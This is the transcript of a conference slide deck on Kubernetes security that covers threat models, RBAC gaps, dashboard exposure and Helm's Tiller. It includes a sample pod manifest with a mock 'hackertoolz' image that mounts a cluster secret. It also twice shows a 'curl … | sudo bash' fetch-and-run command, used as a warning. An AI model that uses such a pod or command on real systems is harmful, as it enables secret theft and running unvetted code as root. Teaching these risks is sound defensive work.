Kubernetes security

“...hundreds of Kubernetes administration consoles accessible over the internet without
any password protection…”

Security with VMs on cloud ≠ Security with Kubernetes

A lot of the same and much more!

Kubernetes • etcd encryption • authentication • authorization • dashboard
access • network policies • pod security policies • secret access • audit logs • sandboxing and runtime protection • security updates • secrets management • certiﬁcate rotation Containers • trusted images • image scanning • image patching • custom image storage • non-root user Platform • node-to-node network security • access to nodes (SSH etc.) • security updates • deployment pipeline • multi-tenancy

Jaakko Pallari Lead SRE Consultant @ Polar Squad Certiﬁed Kubernetes
Administrator not a security expert

Know your threat model!

Make sure to keep your threat model updated!

STRIFE PASTA TRIKE VAST OCTAVE

What are you building, and what can go wrong?

Production environment Customer data nearby Loss of revenue, trust, reputation
Legal liability Development environment No real data in sight Devs are inconvenienced at most

Who’s using the cluster? Can you trust these people?

multi-tenant +1k people from many teams single tenant 2-10 person
dev team

How are you running Kubernetes?

Public or shared network Locked down network with strict ﬁrewall
rules etc.

Using Amazon EKS? No Pod Security Policies for you!

Using ﬂannel for networking? No network policies for you!

Which security features to use?

TLS for internal comms. Authentication RBAC Network Policies Pod Security
Policies must have must have for multi-tenancy

Let’s talk about RBAC Role-Based Access Control

1. Figure out the minimal permissions 2. Create a role
with the permissions 3. Attach the role to user/group … and Bob’s your uncle! Right?

Getting around permission scopes

secrets pods user

secrets pods deployments user

apiVersion: v1 kind: Pod metadata: name: slurpsecrets spec: containers: -
image: hackertoolz.io/slurpsecrets name: slurpsecrets volumeMounts: - name: supersecret mountPath: "/secrets" readOnly: true volumes: - name: supersecret secret: secretName: supersecret

Also watch out for kubectl exec !

Avoid giving pod execution permissions

namespace 1 super secrets pods user namespace 2 test secrets
pods

“Am I building a backdoor?”

Kubernetes dashboard is super useful!

...it also requires access to basically everything

Don’t run Kubernetes dashboard in production!

Metrics

package manager for Kubernetes =

Packaging and distributing k8s resources Managing package (=chart) installations

Kubernetes cluster Deployment Service kubectl RBAC

Kubernetes cluster Tiller Deployment Service kubectl helm RBAC No RBAC
helm repo

helm install stable/wordpress

curl https://cool.io/install.sh | sudo bash

Helm v3 will remove Tiller, and integrate with RBAC!

Workarounds “Tillerless” Helm Don’t use Helm for installing things

“Tillerless” Helm Kubernetes cluster Tiller Deployment Service kubectl helm https://rimusz.net/tillerless-helm
RBAC RBAC

Don’t use Helm for installing things helm template CHART --output-dir
somedir kubectl apply -f somedir/

curl https://cool.io/install.sh | sudo bash Fetch Install

Host Helm charts in your own VCS

Final words...

Remember your threat model!

Make sure the platform supports what you need!

Security in Kubernetes is hard!

Kubernetes is not for everyone

Check out this book! https://kubernetes-security.info/

Kubernetes security

Kubernetes security

More Decks by Jaakko Pallari

Other Decks in Technology

Featured

Transcript